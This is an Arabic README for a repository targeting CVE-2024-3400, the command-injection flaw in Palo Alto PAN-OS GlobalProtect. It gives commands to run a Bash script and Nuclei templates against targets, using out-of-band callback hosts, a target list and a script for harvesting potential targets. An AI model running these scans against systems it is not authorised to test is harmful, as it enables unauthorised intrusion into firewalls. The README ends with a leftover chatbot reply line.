


قد تتيح ثغرة حقن أوامر ناتجة عن إنشاء ملفات عشوائية في ميزة GlobalProtect من برنامج Palo Alto Networks PAN-OS، وذلك لإصدارات محددة من PAN-OS وتكوينات ميزات معينة، لمهاجم غير مصادق تنفيذ تعليمات برمجية عشوائية بصلاحيات الجذر على جدار الحماية.
لا تتأثر بهذه الثغرة كل من Cloud NGFW وأجهزة Panorama وPrisma Access.
يحتوي هذا المستودع على قالب Nuclei مصمم لاكتشاف الثغرات المتعلقة بثغرات Palo Alto PAN-OS، ويستهدف على وجه التحديد CVE-2024-3400.
تم إجراء قائمة شاملة من الأبحاث بواسطة
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
نفّذ الأمر التالي لتشغيل سكربت Bash:
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
سيتحقق السكربت مما إذا تم إنشاء ملف (إرجاع حالة 200 OK). إذا نجح، فسيتحقق بعد ذلك من وجود الملف (إرجاع حالة 403 Forbidden).
interactsh-client -v
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
يمكن العثور على قائمة بالأهداف المحتملة هنا.
python fofax3r.py
يوفر ملف README.md هذا معلومات حول الثغرة، وكيفية استخدام السكربتات المقدمة، والأهداف المحتملة، وينسب الفضل إلى المؤلف. أخبرني إذا كنت بحاجة إلى أي تعديلات إضافية!